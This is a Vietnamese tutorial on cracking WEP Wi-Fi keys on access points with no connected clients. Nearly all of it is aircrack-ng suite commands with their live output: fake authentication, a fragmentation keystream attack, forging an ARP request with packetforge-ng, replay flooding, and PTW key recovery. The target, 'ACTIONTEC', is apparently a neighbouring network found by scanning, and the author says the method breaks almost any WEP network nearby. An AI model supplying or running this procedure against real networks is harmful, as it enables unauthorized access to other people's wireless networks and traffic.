Cách dò khóa WEP khi không có client nào kết nối đến access point

Giờ mà viết bài crack wep thì nghe có vẻ lỗi thời nhỉ, dùng công nghệ của năm 2010 để bẻ khóa công nghệ của những năm 2000. Nhưng thực tế thì có đến 30-40% số mạng không dây hiện tại vẫn dùng phương pháp mã hóa yếu ớt này. Do vậy đề tài dò khóa wep luôn là một đề tài được nhiều người quan tâm

Thông thường crack wep khá dễ, nhưng đó là đối với các mạng đang có client kết nối. Khi client dùng mạng thì thi thoảng sẽ tạo ra những gói ARP request và ta sẽ bắt gói tin này, bơm liên tục vào access point khiến cho access point phải “nhả” key ra cho ta dùng. Tuy nhiên đối với mạng không có client thì sao, sẽ không có ARP request để mà bơm, do vậy ta phải tự “tạo” ra một gói ARP làm sao cho access point tưởng đó là thật mà nhả key ra
Bài này sử dụng file iso Backtrack 4.0 final và usb wifi TP-Link WN321G, cả 2 đều được mount vào máy ảo VMware để có thể vừa dò vừa viết log
Sau khi quét phát hiện thấy mạng ACTIONTEC sóng khá tốt nhưng ko hề có data, tức ko có client nào kết nối
Code:

[CH  7 ][ Elapsed: 3 mins ][ 2010-01-22 22:41

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:1E:E5:98:41:BE  -73      111      223    0  11  54 . WEP  WEP    OPN  delta
 00:0F:B3:3A:76:35  -76       36        0    0   9  54 . WEP  WEP         ACTIONTEC
 00:B0:0C:3E:12:3B  -82       72        0    0   6  54   OPN              TENDA
 00:B0:0C:05:1A:0A  -83       11        0    0   6  54   WPA2 CCMP   PSK  PhanBro

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:1E:E5:98:41:BE  00:1D:0F:DF:E3:00    0    0 - 1      0      114
 00:1E:E5:98:41:BE  00:12:F0:CA:2B:BE   -1    1 - 0      0      359
 (not associated)   00:1F:E1:9C:98:17  -79    0 - 1      0       19  ZyXEL
 (not associated)   00:21:00:B7:DE:02  -81    0 - 1      0       19  vietdat
 (not associated)   00:16:EA:C6:16:62  -37    0 - 1      0       17

Đầu tiên, sniff mạng ACTIONTEC vào file
Code:

airodump-ng wlan0 -c 9 --bssid 00:0F:B3:3A:76:35 -w actiontec

CH  9 ][ Elapsed: 19 mins ][ 2010-01-22 23:02

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:0F:B3:3A:76:35  -81   0     4015        0    0   9  54 . WEP  WEP    OPN  ACTIONTEC

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

Giả mạo làm một người dùng hợp pháp bằng tính năng fake authentication của aireplay-ng
Code:

aireplay-ng -1 10 -a 00:0F:B3:3A:76:35 wlan0 

root@bt:~# aireplay-ng -1 10 -a 00:0F:B3:3A:76:35 wlan0
No source MAC (-h) specified. Using the device MAC (00:1D:0F:DF:E3:00)
22:43:11  Waiting for beacon frame (BSSID: 00:0F:B3:3A:76:35) on channel 9

22:43:11  Sending Authentication Request (Open System) [ACK]
22:43:11  Authentication successful
22:43:11  Sending Association Request [ACK]
22:43:11  Association successful :-) (AID: 1)
22:43:21  Sending Authentication Request (Open System)

Rình rập một chú “cừu non” đi lạc. Nguyên lý của cách tấn công này là tóm lấy 1 packet phù hợp từ accesspoint, sử dụng các thông số có trong packet này để tạo ra arp request. Tùy vào sự may mắn, bạn có thể phải chờ chương trình read vài ngàn gói tin mới có thể tìm được một gói tin ưng ý, gói tin này có chứa keystream.
Code:

root@bt:~# aireplay-ng -5 -b 00:0F:B3:3A:76:35 wlan0
No source MAC (-h) specified. Using the device MAC (00:1D:0F:DF:E3:00)
22:44:26  Waiting for beacon frame (BSSID: 00:0F:B3:3A:76:35) on channel 9
22:44:26  Waiting for a data packet...
Read 2233 packets...

        size: 386, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:0F:B3:3A:76:35
          Dest. MAC  =  01:00:5E:7F:FF:FA
         Source MAC  =  00:0F:B3:3A:76:32

        0x0000:  0842 0000 0100 5e7f fffa 000f b33a 7635  
        0x0010:  000f b33a 7632 403f aa16 ea00 41a3 9c9c  
        0x0020:  fc66 2e21 4713 6d55 be7b b622 a5c8 47f1
        0x0030:  be1f 4cd4 c488 5d6c a4de 07e4 d815 88f4  
        0x0040:  75ae cce8 2092 854a 8101 73d4 77f4 2e80
        0x0050:  1321 0747 5aaa 8025 04a2 c65e a237 794e 
        0x0060:  556c f897 2f02 dab6 6a13 5967 c6a2 548e 
        0x0070:  ca0d bb21 326f 2abe 8afa aae5 9212 2ca9 
        0x0080:  1046 0084 0319 2b46 e651 6497 0c72 d1b1
        0x0090:  2335 ffc8 111c 152e 2b49 e222 a204 06ea 
        0x00a0:  5594 19b3 cebf 0eaf b295 d9de 6768 595a 
        0x00b0:  0eb5 f86f 4349 5d75 b650 34a2 61ed 2c42 
        0x00c0:  ce30 f519 bc72 57af 8367 bce6 d87f 3fd6 
        0x00d0:  7c42 fd6a 8dff 9384 a5df dfa0 292e 194a 
        --- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-0122-224956.cap
22:50:00  Data packet found!
22:50:00  Sending fragmented packet
22:50:00  Got RELAYED packet!!
22:50:00  Trying to get 384 bytes of a keystream
22:50:00  Not enough acks, repeating...
22:50:00  Trying to get 384 bytes of a keystream
22:50:00  Got RELAYED packet!!
22:50:00  Trying to get 1500 bytes of a keystream
22:50:00  Got RELAYED packet!!
Saving keystream in fragment-0122-225000.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Dùng packetforce-ng để chế biến ra một arp request hoàn toàn hợp lệ, giống như chú blackberry của mấy anh Hồ Cẩm Đào vậy
Code:

root@bt:~# packetforge-ng -0 -a 00:0F:B3:3A:76:35 -h 00:1D:0F:DF:E3:00 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0122-225000.xor -w arp-req

Wrote packet to: arp-req

Có đạn rồi thì cứ lắp vào súng máy mà bắn thôi
Code:

root@bt:~# aireplay-ng -2 -r arp-req wlan0
No source MAC (-h) specified. Using the device MAC (00:1D:0F:DF:E3:00)

        size: 68, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:0F:B3:3A:76:35
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:1D:0F:DF:E3:00

        0x0000:  0841 0201 000f b33a 7635 001d 0fdf e300 
        0x0010:  ffff ffff ffff 8001 06cc 8500 fdf0 b56b  
        0x0020:  aa0c d118 7897 55e7 c4c6 8806 6fca 10d9 
        0x0030:  2976 ea99 b1eb 35d6 097b 4702 72ec 4829 
        0x0040:  c854 6e25                               

Use this packet ? y

Saving chosen packet in replay_src-0122-230028.cap
You should also start airodump-ng to capture replies.

Send 4580 packets…(499pps)

Quay lại airodump-ng xem lượng data tăng vùn vụt
Code:

[ CH  9 ][ Elapsed: 19 mins ][ 2010-01-22 23:02

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:0F:B3:3A:76:35  -81   0     4015    25972  442   9  54 . WEP  WEP    OPN  ACTIONTEC

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:0F:B3:3A:76:35  00:1D:0F:DF:E3:00    0    0 - 1      1    59304

Với tốc độ 500pps thì chỉ cần 30s để phá wep 64 bit, còn wep 128 bit thì lâu hơn 20 lần, khoảng 10 phút
Code:

root@bt:~# aircrack-ng -a 1 actiontec-01.cap
Opening actiontec-01.cap
Read 53122 packets.

   #  BSSID              ESSID                     Encryption

   1  00:0F:B3:3A:76:35  ACTIONTEC                 WEP (12538 IVs)

Choosing first network as target.

Opening actiontec-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 12633 ivs.

                                          Aircrack-ng 1.0 rc3 r1552

                          [00:01:33] Tested 775 keys (got 41314 IVs)

   KB    depth   byte(vote)
    0    1/  2   5E(52736) 95(49152) 49(48896) 46(48640) 65(48384) 67(48384) 99(48128)
    1   16/  1   B6(46336) C3(45824) 73(45568) C5(45568) DF(45568) 04(45056) 2A(45056)
    2    0/  3   33(57856) C2(50944) 4B(49920) 7E(49408) 0C(48896) 76(48128) 4F(47616)
    3    0/  6   44(56064) F3(51712) 24(49920) 31(48640) 57(48640) 2F(48384) 19(48128)
    4   41/  4   B6(44800) 03(44544) 4A(44544) 6A(44544) 91(44544) A3(44544) CD(44544)

             KEY FOUND! [ 11:11:11:11:11:11:11:11:11:11:11:11:11 ]
        Decrypted correctly: 100%

Ngoài ra còn một số cách nữa nhưng với bài viết này bạn có thể dò được đến 99% mạng wireless dùng WEP xung quanh, trừ những mạng xác thực bằng RADIUS (mà thực tế rất ít).